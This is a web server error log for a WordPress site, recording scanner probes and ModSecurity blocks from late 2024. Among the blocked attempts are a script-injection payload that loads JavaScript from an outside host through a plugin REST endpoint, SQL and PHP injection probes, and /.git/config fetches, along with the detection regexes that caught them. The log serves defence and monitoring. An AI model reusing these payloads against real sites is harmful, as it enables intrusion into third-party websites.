(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:26:59.947553 2024] [autoindex:error] [pid 24304:tid 139888234006272] [client 87.120.127.64:60638] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:27:04.252396 2024] [autoindex:error] [pid 24861:tid 139888275969792] [client 87.120.127.64:60642] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:27:07.740476 2024] [autoindex:error] [pid 24304:tid 139888359896832] [client 87.120.127.64:60646] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:27:09.316533 2024] [autoindex:error] [pid 24861:tid 139888292755200] [client 87.120.127.64:60650] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/dist/vendor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:27:16.756340 2024] [autoindex:error] [pid 24302:tid 139888259184384] [client 87.120.127.64:60654] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/imgareaselect/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:27:25.134543 2024] [autoindex:error] [pid 24303:tid 139888464627456] [client 87.120.127.64:60666] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jcrop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:27:30.491348 2024] [autoindex:error] [pid 24303:tid 139888351504128] [client 87.120.127.64:60670] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:27:35.419288 2024] [autoindex:error] [pid 24303:tid 139888275969792] [client 87.120.127.64:60676] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jquery/ui/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:27:40.815132 2024] [autoindex:error] [pid 24861:tid 139888326326016] [client 87.120.127.64:60680] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/mediaelement/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:27:50.375471 2024] [autoindex:error] [pid 24861:tid 139888267577088] [client 87.120.127.64:60684] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/mediaelement/renderers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:27:56.850824 2024] [autoindex:error] [pid 24861:tid 139888439449344] [client 87.120.127.64:60694] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:28:14.404691 2024] [autoindex:error] [pid 24304:tid 139888242398976] [client 87.120.127.64:60704] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/swfupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:28:16.936267 2024] [autoindex:error] [pid 24304:tid 139888473020160] [client 87.120.127.64:60710] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/thickbox/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:28:22.883176 2024] [autoindex:error] [pid 24861:tid 139888225613568] [client 87.120.127.64:60714] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:28:28.665862 2024] [autoindex:error] [pid 24304:tid 139888301147904] [client 87.120.127.64:60722] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/langs/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:28:49.987983 2024] [autoindex:error] [pid 24304:tid 139888234006272] [client 87.120.127.64:60740] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/search/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:28:55.349830 2024] [autoindex:error] [pid 24861:tid 139888447842048] [client 87.120.127.64:60748] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/image/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:29:00.105969 2024] [autoindex:error] [pid 24861:tid 139888464627456] [client 87.120.127.64:60754] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/hr/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:29:07.402882 2024] [autoindex:error] [pid 24861:tid 139888284362496] [client 87.120.127.64:60758] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/fullscreen/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 17:07:37.405286 2024] [:error] [pid 24304:tid 139888242398976] [client 45.227.254.34:33890] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/wp-admin.php"] [unique_id "ZyKuKbhKJkAf36qZYeIp6QAAAJU"] [Wed Oct 30 19:06:58.088860 2024] [authz_core:error] [pid 24861:tid 139888351504128] [client 209.38.208.202:35604] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/30 19:07:03 [error] 24258#24258: *742377 access forbidden by rule, client: 209.38.208.202, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Oct 31 03:46:36.962913 2024] [ssl:warn] [pid 5064:tid 139662523455360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Oct 31 03:46:37.259080 2024] [ssl:warn] [pid 5065:tid 139662523455360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Oct 31 03:46:37.700421 2024] [ssl:warn] [pid 5065:tid 139662523455360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Oct 31 03:46:40.168710 2024] [ssl:warn] [pid 5065:tid 139662523455360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Oct 31 03:46:42.514362 2024] [ssl:warn] [pid 5482:tid 140589119121280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Oct 31 03:46:42.881873 2024] [ssl:warn] [pid 5483:tid 140589119121280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/10/31 15:59:01 [error] 5369#5369: *754419 access forbidden by rule, client: 45.87.42.72, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/31 16:12:51 [error] 5369#5369: *754545 access forbidden by rule, client: 45.87.42.72, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/10/31 16:28:54 [error] 5370#5370: *754626 access forbidden by rule, client: 45.87.42.72, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Thu Oct 31 23:46:35.456083 2024] [authz_core:error] [pid 5501:tid 140588808648448] [client 164.90.208.56:38636] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/31 23:46:40 [error] 5369#5369: *757773 access forbidden by rule, client: 164.90.208.56, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Nov 01 01:07:00.978123 2024] [authz_core:error] [pid 5502:tid 140588733114112] [client 45.227.254.34:41654] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/class.akismet-https.php [Fri Nov 01 03:38:40.227141 2024] [ssl:warn] [pid 15865:tid 140508923017088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 01 03:38:40.527633 2024] [ssl:warn] [pid 15866:tid 140508923017088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 01 03:38:41.132068 2024] [ssl:warn] [pid 15866:tid 140508923017088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 01 03:38:43.527780 2024] [ssl:warn] [pid 15866:tid 140508923017088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 01 03:38:45.817410 2024] [ssl:warn] [pid 16281:tid 140018181056384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 01 03:38:46.107753 2024] [ssl:warn] [pid 16282:tid 140018181056384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 01 07:48:51.584496 2024] [autoindex:error] [pid 16299:tid 140017863218944] [client 13.71.28.55:46604] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Nov 01 18:12:04.324683 2024] [authz_core:error] [pid 16301:tid 140017821255424] [client 139.59.143.102:58162] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/01 18:12:09 [error] 16263#16263: *775283 access forbidden by rule, client: 139.59.143.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Nov 02 03:16:46.319365 2024] [ssl:warn] [pid 22073:tid 139700642961280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 02 03:16:46.573964 2024] [ssl:warn] [pid 22074:tid 139700642961280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 02 03:16:47.196682 2024] [ssl:warn] [pid 22074:tid 139700642961280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 02 03:16:52.592454 2024] [ssl:warn] [pid 22074:tid 139700642961280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 02 03:16:54.994648 2024] [ssl:warn] [pid 22496:tid 140267079260032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 02 03:16:55.267246 2024] [ssl:warn] [pid 22497:tid 140267079260032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 02 04:48:23.384130 2024] [authz_core:error] [pid 22927:tid 140266635712256] [client 64.227.70.2:40360] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/02 04:48:28 [error] 22478#22478: *783411 access forbidden by rule, client: 64.227.70.2, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Nov 02 07:11:24.509554 2024] [:error] [pid 22516:tid 140266728032000] [client 179.43.191.19:42674] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZyYW7L69UuhnMBwHXxfTqAAAAIw"], referer: https://investigacionperu.com [Sat Nov 02 08:28:45.228290 2024] [authz_core:error] [pid 22516:tid 140266786780928] [client 206.189.2.13:44656] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/02 08:28:50 [error] 22479#22479: *786374 access forbidden by rule, client: 206.189.2.13, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/02 20:43:43 [error] 22478#22478: *797281 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/02 20:56:11 [error] 22479#22479: *797335 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Nov 02 20:59:32.307679 2024] [:error] [pid 22927:tid 140266879727360] [client 51.195.88.32:56162] [client 51.195.88.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at REQUEST_COOKIES:14[208]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyseven/index.php"] [unique_id "ZybZBEO7ZPxoh-OryY2gFwAAAMI"] [Sat Nov 02 20:59:32.839103 2024] [:error] [pid 22515:tid 140266761602816] [client 51.195.88.32:56164] [client 51.195.88.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at REQUEST_COOKIES:14[208]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZybZBOxHcNopn6WJuApu5QAAAEg"] 2024/11/02 23:08:14 [error] 22478#22478: *798422 access forbidden by rule, client: 45.148.10.123, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/02 23:39:54 [error] 22479#22479: *798632 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/11/03 01:05:29 [error] 22478#22478: *799240 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sun Nov 03 03:43:43.619678 2024] [ssl:warn] [pid 17395:tid 140026339338112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 03 03:43:43.921354 2024] [ssl:warn] [pid 17396:tid 140026339338112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 03 03:43:44.612652 2024] [ssl:warn] [pid 17396:tid 140026339338112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 03 03:43:46.725022 2024] [ssl:warn] [pid 17396:tid 140026339338112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 03 03:43:49.088339 2024] [ssl:warn] [pid 17811:tid 140641843857280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 03 03:43:49.366951 2024] [ssl:warn] [pid 17812:tid 140641843857280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/11/03 03:46:41 [error] 17708#17708: *801169 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/03 10:30:34 [error] 17708#17708: *805540 access forbidden by rule, client: 3.22.175.207, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Nov 04 06:45:54.334020 2024] [authz_core:error] [pid 2412:tid 140641589786368] [client 206.81.24.74:49118] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/04 06:45:56 [error] 17708#17708: *810852 access forbidden by rule, client: 206.81.24.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Nov 04 09:47:57.564890 2024] [authz_core:error] [pid 2270:tid 140641421932288] [client 134.209.25.199:49746] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/04 09:47:59 [error] 17708#17708: *811144 access forbidden by rule, client: 134.209.25.199, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/04 10:26:11 [error] 17708#17708: *811545 access forbidden by rule, client: 45.148.10.122, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/04 12:06:12 [error] 17709#17709: *813133 access forbidden by rule, client: 45.148.10.122, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/04 12:46:02 [error] 17709#17709: *813364 access forbidden by rule, client: 45.148.10.122, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/04 15:39:58 [error] 17708#17708: *815240 access forbidden by rule, client: 45.148.10.122, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/04 20:04:00 [error] 17708#17708: *817741 access forbidden by rule, client: 45.148.10.122, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Tue Nov 05 03:31:43.596606 2024] [ssl:warn] [pid 846:tid 139756309952384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 05 03:31:43.895278 2024] [ssl:warn] [pid 847:tid 139756309952384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 05 03:31:44.248745 2024] [ssl:warn] [pid 847:tid 139756309952384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 05 03:31:46.257168 2024] [ssl:warn] [pid 847:tid 139756309952384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 05 03:31:48.648502 2024] [ssl:warn] [pid 1277:tid 139934627633024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 05 03:31:48.947019 2024] [ssl:warn] [pid 1278:tid 139934627633024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 05 05:58:55.255666 2024] [autoindex:error] [pid 1296:tid 139934186792704] [client 64.227.180.236:42260] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Nov 05 18:15:32.993590 2024] [autoindex:error] [pid 1297:tid 139934428100352] [client 5.181.188.149:58166] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 05 18:15:41.119430 2024] [autoindex:error] [pid 1297:tid 139934237148928] [client 5.181.188.149:58174] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 05 18:15:42.604510 2024] [autoindex:error] [pid 1296:tid 139934295897856] [client 5.181.188.149:58178] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 05 18:15:46.966506 2024] [autoindex:error] [pid 1296:tid 139934279112448] [client 5.181.188.149:58182] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 05 18:15:59.730955 2024] [autoindex:error] [pid 1297:tid 139934287505152] [client 5.181.188.149:58192] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 05 18:16:01.680991 2024] [autoindex:error] [pid 1295:tid 139934444885760] [client 5.181.188.149:58196] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 05 19:57:30.651422 2024] [autoindex:error] [pid 1905:tid 139934245541632] [client 136.144.33.189:59194] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: 